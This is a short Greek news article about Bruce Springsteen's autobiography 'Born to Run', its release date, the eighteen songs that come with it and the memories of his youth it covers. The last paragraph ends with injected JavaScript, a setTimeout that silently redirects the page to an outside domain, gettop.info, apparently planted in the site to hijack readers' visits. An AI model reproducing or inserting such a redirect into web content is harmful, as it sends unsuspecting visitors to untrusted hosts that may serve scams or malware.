Έρχεται η αυτοβιογραφία του Μπρους Σπρίνγκστιν – Διπλό δώρο για τους θαυμαστές

0
10

 

Δεκαοκτώ τραγούδια του Μπρους Σπρίνγκστιν, από τα οποία τα πέντε ανέκδοτα, θα συνοδεύσουν την πολυαναμενόμενη αυτοβιογραφία του… «Αφεντικού» που κυκλοφορήσει παγκοσμίως στις 27 Σεπτεμβρίου.

Ο Σπρίνγκστιν γράφει αυτό το βιβλίο με την ιστορία της ζωής του τα τελευταία εφτά χρόνια. Η αυτοβιογραφία του τιτλοφορείται «Born to Run» το τραγούδι που σημάδεψε τον καλλιτέχνη όπως ο ίδιος λέει γιατί αποκαλύπτει πολύ περισσότερα από ό,τι είχε πραγματικά φαντασθεί.

Ο «Boss» περιγράφει τα χρόνια στο Φρίχολντ του Νιου Τζέρσεϊ, όπου μεγάλωσε μεταξύ «ποίησης, κινδύνου και σκότους», τα οποία τροφοδότησαν, όπως γράφει, τη φαντασία του.

«Είναι αστείο να γράφεις για τον εαυτό σου», ομολογεί ο Σπρίνγκστιν στο βιβλίο του, «αλλά σε ένα τέτοιο έργο όπως αυτό, ο συγγραφέας οφείλει να κρατήσει την υπόσχεση που έδωσε στον εαυτό, να αποκαλύψει στον αναγνώστη αυτά που έχει κατά νου, και αυτό προσπάθησα να κάνω».

Επίσης, γράφει για την ασίγαστη επιθυμία του να γίνει μουσικός, τα πρώτα βήματα ως «βασιλιάς» σε μία μπάντα που έπαιζε σε μπαρ στο Άσμπουρι Παρκ και την άνοδο της διάσημης E Street Band. Αποκαλύπτει για πρώτη φορά τις προσωπικές του αγωνίες και πώς αυτές ενέπνευσαν τα καλύτερα έργα του.

Επιπλέον, ο Σπρίνγκστιν βγάζει προς τα έξω με παιδική ευαισθησία, κομμάτια της ζωής του, κάτι που ουσιαστικά αποτελεί ένα δώρο προς τους αναγνώστες, μία πράξη αθωότητας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here